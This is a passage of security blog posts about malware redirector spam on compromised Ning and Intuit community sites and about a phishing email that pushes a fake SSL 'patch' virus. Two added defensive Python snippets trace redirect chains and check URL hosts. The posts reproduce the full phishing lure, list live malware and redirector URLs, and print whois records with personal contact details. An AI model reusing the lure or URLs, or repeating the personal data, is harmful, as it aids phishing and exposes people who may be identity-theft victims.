registrar: NAUNET-REG-RIPN
created: 2010.07.05
paid-till: 2011.07.05
source: TCI

whois sheepbody.com

Domain Name: SHEEPBODY.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Anna Veprinceva es@qx8.ru +7.4957211411
Anna Veprinceva
ul.Kostromskaya d.4 kv.114
Moskva,Moskva,RU 127549

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

whois cafemack.com

Domain Name: CAFEMACK.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Alexander Ksalov soy@qx8.ru +7.4957888901
Alexander Ksalov
Izyumskaya ul. d.26 k.2 kv.54
Moskva,Moskva,RU 117042

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

The payload site, knewname.com, is pixel-for-pixel identical to the other, more traditional pharmacy spam sites I’m seeing, such as superviagraonline.com. These sites are themselves virtually identical to, and use the same graphics as, other spam sites that places like the Spamtrackers wiki have connected to other Canadian Pharmacy spam (known Canadian Pharmacy spam site on left, knewname.com on right, click either thumbnail for a larger screen shot):


Conclusion: The Canadian Pharmacy spammers are directly involved in the writing and/or distribution of malware themselves, and have now begun an experiment in which they attempt to infect their own customers with their malware.

Ning: Where security is something we consider.

A few days ago, I wrote about what appears to be a massive breach at Ning, a social networking platform that allows people to create their own niche social networking sites. The Ning security appears to be compromised, and the social networking sites they host are overrun with automated spam advertising links and redirectors to computer viruses–over a million of them, in fact.

As a good Internet citizen, I dropped an email to Ning alerting them to the problem. I’ve since received back what appears to be a stock form email in response:

Hi there,

Thanks for bringing this to our attention. As you may already know, Ning is a platform that enables individuals to build their own social networks. We aren’t involved in the decisions relating to content uploaded or published by Network Creators or members. In addition, we aren’t involved in the management of the social networks on our platform, or in any of the decisions relating to the focus of social networks created on our platform. That said, we’ll look into this and take action if we determine that our Terms of Service have been violated.

Thanks again!
The Ning Team

ref:00D8cCLt.5004AJJb9:ref

I’ve checked, and the problem still exists. Google is delisting the virus redirectors pretty quickly, but they’re being added even more quickly. Right now, Google shows about 600,000 virus redirectors on various Ning-hosted sites, with many more existing but not listed in Google.

It seems that Ning either does not understand or does not care about the scope of the problem they face.

In a way, I’m not surprised. iPower Web took over a year to fix their security when they were hit with a massive, ongoing server security breach, for example.

But it is disappointing. An executive at Verizon recently wrote an essay deriding security researchers who talk about security issues publicly as “narcissistic vulnerability pimps” who “solely for the purpose of self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”

But considering how poorly ISPs and software vendors tend to respond to security problems, and how cavalier they seem to be with the safeguarding of their users’ data, it’s hard to see this essay as anything more than the whining of crybaby managers who would rather play Quake III Arena than take care of fixing gaping security holes in their systems.

Meantime, I still suggest that anyone hosted on Ning seek hosting elsewhere.

Another day, another massive computer hack attack

Note: followup to this post at http://tacit.livejournal.com/325770.html

I run quite a number of WordPress blogs: weeklysextips.com, the Whispers blog at symtoys.com, the Skeptical Pervert blog (which I haven’t actually done anything with yet, as I haven’t started my podcast yet), and so on.

These blogs all run comment spam filtering software, because automated WordPress comment spam is a big problem with any WordPress blog. A lot of the automated comment spam contains, of course, redirectors to malware, mostly disguised as porn links.

I occasionally trawl through the spam comments on my blogs; it’s an amazing early warning system to see what the malware writers are up to these days. Recently, I found a spate of malware spam advertising URLs hosted on a Web site called nashville.net; the spam promised all sorts of free sexual delights if I would but go to such Web addresses as

http://www.nashville.net/profile/3nz5lxzvocvcd
and
http://www.nashville.net/profile/jetttoland59

and so on.

I did some poking around on Nashville.net and discovered that it has been compromised like a Senator with a gambling addiction; at the moment, it’s hosting somewhere around 4,200 phony profiles, all of which are redirectors to sites that try to download malware. Each phony profile leads to the same place: a URL at

http://sexsuite.ru/stds/go.php?sid=14

which is a traffic-handling Web site that works the same way as the traffic redirector sites used by the malware networks I’ve talked about before.

So I decided to be a good citizen and drop a line to the owner of nashville.net, and his Web host, letting him know he’d been massively breached.

That’s when things got interesting.


The Web site nashville.net is a “community site,” a small niche social networking site hosted by an outfit called Ning.

Parsing input: nashville.net
Routing details for 8.6.19.68
“whois NET-8-6-19-0-1@whois.arin.net” (Getting contact from whois.arin.net )
Found AbuseEmail in whois abuse@ning.com
8.6.19.0 – 8.6.19.255:abuse@ning.com
Using abuse net on abuse@ning.com
abuse net ning.com = postmaster@ning.com, abuse@ning.com, abuse@level3.com

Ning is a personal social networking site founded by the guy who started Netscape, Marc Andreessen. It basically lets you create your own mini MySpace or LiveJournal or whatever you like–a small social networking platform aimed at whatever niche you want. It’s had a checkered past, and has struggled to make money; three days ago, Ning announced that it would become pay only and would cancel its free services. It also fired 40% of its staff.

But that’s not the really interesting part.

The really interesting part is that it looks like all of Ning, with all the social networks and online forums it hosts, has been pwn3d from balls to bones.

A search for some of the exact words and phrases used by the virus redirectors on nashville.net, one of Ning’s social networking sites, produces 1,060,000 results…and as near as I can tell, they are all on Ning.

Now, a conspiracy theorist might come up with all kinds of conspiracies to explain this–disgruntled employees, knowing what was coming, leaving the back door open; executives of a foundering company, desperate for cash, turning a blind eye to Russian malware writers; whatever. I suspect that the reality is what it always is–incompetence, someone asleep at the switch, management that doesn’t appreciate security and doesn’t want to pay for it…the same sorts of things that seem to be behind this sort of thing almost every time.

But if you use Ning, or you know someone who does, my advice is to leave.

Computer security? Best practice? yeah, those are things we’ve heard of.

If you’ve ever run a small business, or done any accounting, you’re probably familiar with Intuit, the company that makes the popular QuickBooks accounting software.

Intuit does a lot of things other than QuickBooks, of course. They are also a business Web hosting company, a payroll tax service, a credit card merchant account company, a computer virus distribution network, and a marketing company, among other things. Not everyone knows about all the services they offer; in particular, their marketing and computer virus distribution services appear to be underrated.

Yep, you read that right. They distribute computer viruses.

Oh, not on purpose, I’m sure. They simply appear to run Web sites whose Webmasters don’t really seem to know a lot about Web security. Which would seem to be about par for the course these days, except that they..err, specialize in software that handles business financial information.

Which is a wee bit concerning, if you use Intuit and would like to feel reassured that they take the security of their network and servers seriously.

Now, to be fair, it’s not actually their main site that has the problem, at least not that I’ve seen so far. Instead, they run many “community” sites, and on some of these sites they appear to have a…relaxed approach to security and best practices.

*** WARNING *** WARNING *** WARNING ***
The URLs listed below are live as of the time of this writing. They WILL try to redirect you to sites that attempt to download malware onto your computer. DO NOT visit these URLs if you don’t know what you’re doing!

While cleaning out the contents of the spam trap on one of the WordPress sites I run, I spotted a large number of spam-trapped comments advertising FREE NUDE PICTURES with URLs of an Intuit-owned property, community.quickbooks.co.uk. Now, I see these spam posts all the time, usually made from machines in Eastern Europe and usually pointing to sites that try to download the Asprox or Zlob malware.

This particular site, though, is overrun to a large degree even for sites that have security problems. The site itself allows users to create their own profiles, but it does not appear to sanitize the user-supplied profiles for things like JavaScript and it allows users to embed links and images in their profiles.

Which is, when you get right down to it, a recipe for disaster.

Anyway, the community.quickbooks.co.uk Web site is currently home to a large number of fake, automatically-generated profiles which redirect through a series of intermediates to malware sites that use a cocktail of browser exploits and social engineering tricks to try to slip malware onto visitors’ computers.

A smattering of these profiles includes:

http://community.quickbooks.co.uk/discussion/index.php?showuser=57944

http://community.quickbooks.co.uk/discussion/index.php?showuser=58063

http://community.quickbooks.co.uk/discussion/index.php?showuser=58395

http://community.quickbooks.co.uk/discussion/index.php?showuser=57939

Some of these profile sites, unusually, redirect through TinyURL to the destination payload site; others redirect more conventionally, through traffic loader sites in a manner similar to the ones I’ve written about before.

The sites redirect through TinyURL or another traffic loader to several intermediates and eventually end up at a place such as

http://stereotube.net/xfreeporn.php?id=45035

which offers free porn if you download a movie-player codec…which is, of course, a virus. (No free porn for YOU!)

Unsurprisingly, the payload site stereotube.net is registered with bogus information belonging to an identity theft victim; also unsurprisingly, it’s hosted on black-hat Web hosting company Calpop, a California Web host that has a long and ignoble history of knowingly hosting malware sites for Russian organized crime, as I’ve mentioned before.

In basic scope and layout, this is nothing but yet another Russian malware distribution network. There are only a few things about it that deviate at all from the bog-standard run-of-the-mill compromises I see every day. The first is that the compromised site is owned by Intuit, which makes me very nervous about how seriously they take computer security.

The second is that the phony profile pages that redirect to malware hide some of the redirection steps behind TinyURL redirectors such as http://tinyurl.com/25avirua rather than relying 100% on their own redirector network (the TinyURL address redirects to a more conventional traffic redirector at http://arhetector.com/in.cgi?3&parameter=25aug, hosted by Worldstream.nl, which itself redirects to one of several sites such as stereotube.net or to http://tinyurl.com/stereotubeonline-boom-03, which redirects to http://stereotubeonline.com/xplays.php?id=48034, also hosted by Calpop).
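Added example, not code from the post: a way to walk a redirect chain like the one just described from captured responses rather than by visiting it, pulling the next hop out of an HTTP Location header, a meta refresh tag or a JavaScript location assignment and recording the host at each hop. The captured responses below are constructed stand-ins for the TinyURL, arhetector.com and stereotubeonline.com hops named above, not real page content.

```python
import re
from urllib.parse import urljoin, urlparse

# <meta http-equiv="refresh" content="0;url=..."> in any quoting style.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']'
    r'\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)', re.I)
# window.location = "...", location.href = '...', and similar assignments.
JS_LOCATION = re.compile(
    r'(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)


def next_hop(url, status, headers, body):
    """Return the URL this hop would send a browser to, or None if the page
    is terminal. Targets are resolved against `url` so relative ones work."""
    if status in (301, 302, 303, 307, 308) and headers.get("Location"):
        return urljoin(url, headers["Location"])
    m = META_REFRESH.search(body) or JS_LOCATION.search(body)
    return urljoin(url, m.group(1)) if m else None


def follow(start, fetch, max_hops=10):
    """fetch(url) -> (status, headers, body). Returns [(host, url), ...] for
    every hop visited; stops at a terminal page, a loop, or max_hops."""
    chain, url, seen = [], start, set()
    while url and url not in seen and len(chain) < max_hops:
        seen.add(url)
        chain.append((urlparse(url).hostname, url))
        url = next_hop(url, *fetch(url))
    return chain


# Constructed captures keyed by URL: the hop URLs are the ones named in the
# post, the response bodies and status codes are invented for this example.
CAPTURED = {
    "http://tinyurl.com/25avirua":
        (301, {"Location": "http://arhetector.com/in.cgi?3&parameter=25aug"}, ""),
    "http://arhetector.com/in.cgi?3&parameter=25aug":
        (302, {"Location": "http://tinyurl.com/stereotubeonline-boom-03"}, ""),
    "http://tinyurl.com/stereotubeonline-boom-03":
        (200, {}, '<html><head><meta http-equiv="refresh" '
                  'content="0;url=http://stereotubeonline.com/xplays.php?id=48034">'
                  '</head></html>'),
    "http://stereotubeonline.com/xplays.php?id=48034":
        (200, {}, "<html><body>download the codec to play...</body></html>"),
}


def fetch_captured(url):
    """Offline stand-in for an HTTP client: serve the constructed captures."""
    return CAPTURED.get(url, (404, {}, ""))


def hosts_in_chain(start="http://tinyurl.com/25avirua"):
    """Just the host at each hop, which is what you report to an abuse desk."""
    return [host for host, _ in follow(start, fetch_captured)]


if __name__ == "__main__":
    for host, url in follow("http://tinyurl.com/25avirua", fetch_captured):
        print(f"{host:28} {url}")
```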

The third is that the phony profile pages are pulling images from various real porn sites. For example,

http://community.quickbooks.co.uk/discussion/index.php?showuser=57939

is grabbing a picture from http://www.pink4free.com/blogs/wp-content/uploads/Pink4Free/Cecash/BigTits/AllFreePorn.gif. The Web site pink4free.com used to run a WordPress blog–it appears to be defunct now–but that WordPress blog still has an open image directory, and it contains advertising banners that the Russian hackers are drawing from in a bid to make the redirectors look more convincing.

When I do my taxes next year, I don’t think I’ll use Intuit.

New computer virus scam targets Web site owners

There appears to be a new social engineering attack making the rounds of registered owners of Web sites that have SSL encryption certificates. I have a large number of Web sites, and so far I’ve only received emails to the technical address of sites which have SSL (security) certificates on them.

*** WARNING *** WARNING *** WARNING ***
This attack is currently live. DO NOT attempt to visit the URLs in this email if you do not know what you are doing!

The emails come from a phony From: address that is system@[thewebsitename.com]. Each email takes the form:

Attention!

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.[thenameofthewebsite.com].secure.ssl-datacontrol.com/ssl/id=712571016-[email address of registered contact]-patch257675.aspx

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

So for example if you have a Web site called “theweaselstore.com” and your email address is “headweasel@theweaselstore.com” you may receive an email claiming to be from: system@theweaselstore.com, which tells you to click a link that looks like

http://updates.theweaselstore.com.secure.ssl-datacontrol.com/ssl/id=712571016-headweasel@theweaselstore.com-patch257675.aspx

Needless to say, the “patch” you download from this address is a computer virus.


This is one of the most sophisticated social engineering attempts I’ve seen to date. It seems to be going after a very specific group of people: people who own secure Web sites. The email itself is custom-tailored to look as much as possible like it comes from the system operators of the Web site in question, and the payload is delivered from a hostile server with a URL that has the address of the target site owner’s Web site embedded within it.

My suspicion, though I have not taken the time to analyze the payload, is that it is a key logger, and that the virus writers are attempting to get FTP credentials for the target Web site.

Being able to hack secure Web sites would offer the hacker a treasure trove of advantages. First, secure Web sites may contain customer information, transaction records, payment histories, and credit card numbers for the site’s customers.

Second, a phony bank or eBay site placed on a secure server is more convincing, because the phony site can be accessed using “https://” and will have the browser padlock indicating that the site is secure, which may help it to fool more people.

I’ve mentioned in this post how a Web address can be designed to fool people. It does not matter what’s in the address except for the part in front of the very first / character (the part right after the http://); so for example if you see a Web address that looks like

http://www.ebay.com.ws.eBayISAPI.dll.signin.ru/?SignIn&ru=12345

you are not on eBay. You can see where you are by looking at the part just before the first /, which in this case is

www.ebay.com.ws.eBayISAPI.dll.signin.ru

and ends in signin.ru: a site called signin.ru in Russia.

Similarly, in the URLs in these hacker emails, the key part of the URL is the part before the first / in

http://updates.theweaselstore.com.secure.ssl-datacontrol.com/ssl/id=712571016-headweasel@theweaselstore.com-patch257675.aspx

which is updates.theweaselstore.com.secure.ssl-datacontrol.com, ending in ssl-datacontrol.com. The computer virus is being distributed from a site called “ssl-datacontrol.com”.
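Added example (not from the original post): a Python check that pulls the host name out of a URL the way the rule above says, compares it whole label by whole label against the domain you expect, and shows why a plain substring test is fooled by the lookalike URLs quoted here. The short list of two-label suffixes is an assumption for the example, not a real public suffix list.

```python
from urllib.parse import urlparse

# Constructed, deliberately tiny list of suffixes that take two labels;
# a real tool would use the Public Suffix List instead.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp"}


def host_of(url: str) -> str:
    """The only part of a URL that says where you are: the host name, the
    text between the scheme's // and the first slash after it."""
    host = urlparse(url).hostname
    if not host:
        raise ValueError(f"no host in {url!r}")
    return host.lower()


def registrable_domain(url: str) -> str:
    """The last two labels of the host (three when the suffix itself is two
    labels, e.g. quickbooks.co.uk). Everything to the left is chosen freely
    by whoever controls that domain, so it proves nothing."""
    labels = host_of(url).split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def is_under(url: str, expected: str) -> bool:
    """True only if the host IS `expected` or a subdomain of it. Compares
    whole labels, so www.ebay.com.ws.eBayISAPI.dll.signin.ru does not pass
    for ebay.com even though 'ebay.com' appears inside it."""
    host, expected = host_of(url), expected.lower().strip(".")
    return host == expected or host.endswith("." + expected)


def naive_contains(url: str, expected: str) -> bool:
    """The check that the lookalike URLs in the post are built to fool."""
    return expected.lower() in url.lower()


if __name__ == "__main__":
    # URLs quoted in the post, run through the check.
    for u in (
        "http://www.ebay.com.ws.eBayISAPI.dll.signin.ru/?SignIn&ru=12345",
        "http://updates.theweaselstore.com.secure.ssl-datacontrol.com/ssl/"
        "id=712571016-headweasel@theweaselstore.com-patch257675.aspx",
        "http://community.quickbooks.co.uk/discussion/index.php?showuser=57939",
    ):
        print(f"{registrable_domain(u):24} <- {u}")
```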


ssl-datacontrol.com lives on servers belonging to an ISP called trouble-free.net, which is now a subsidiary of another ISP called interserver.net.

Trouble-free.net is an ISP I’m very familiar with. As near as I can tell, the “trouble” they are free of is meddling trouble such as legal issues, or those pesky problems you might have with having your spam or phish site shut down; they have, in my experience, a long and ignoble history of hosting viruses, spammers, pirate software sites (notorious credit card fraudster and pirate Art Schwartz has been hosted on trouble-free.net for over five years), and other criminal content.

The whois for ssl-datacontrol.com is, unsurprisingly, Russian:

whois ssl-datacontrol.com

Whois Server Version 2.0

Domain Name: SSL-DATACONTROL.COM
Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU
Whois Server: whois.nic.ru
Referral URL: http://www.nic.ru
Name Server: NS1.CEDNS.RU
Name Server: NS2.CEDNS.RU
Status: clientTransferProhibited
Updated Date: 05-oct-2009
Creation Date: 05-oct-2009
Expiration Date: 05-oct-2010

>>> Last update of whois database: Mon, 12 Oct 2009 21:44:52 UTC <<<

Registrant ID: HEIGAAS-RU
Registrant Name: Elena V Zhuravlyova
Registrant Organization: Elena V Zhuravlyova
Registrant Street1: Orekhovyi boulevard
Registrant Street1: d.31 kv.72
Registrant City: Moscow
Registrant State: Moscow
Registrant Postal Code: 115573
Registrant Country: RU

Administrative, Technical Contact
Contact ID: HEIGAAS-RU
Contact Name: Elena V Zhuravlyova
Contact Organization: Elena V Zhuravlyova
Contact Street1: Orekhovyi boulevard
Contact Street1: d.31 kv.72
Contact City: Moscow
Contact State: Moscow
Contact Postal Code: 115573
Contact Country: RU
Contact Phone: +7 499 2678638
Contact E-mail: awoke@co5.ru

Registrar: ANO Regional Network Information Center dba RU-CENTER


So in short what we have is a very sophisticated, highly directed attack targeted at Web site owners who are using SSL security certificates on their Web sites, being conducted through emails which create a custom From address and custom attack URL for each specific victim.

The same rules apply to this as to all emails:

– DO NOT believe the From: address of an email. Ever.

– DO NOT respond to ANY security alert, question, or prompt you receive in ANY email. Ever. No matter who it appears to be from.

– Learn to read Web site URLs. DO NOT trust any part of a URL except the part immediately in front of the first slash.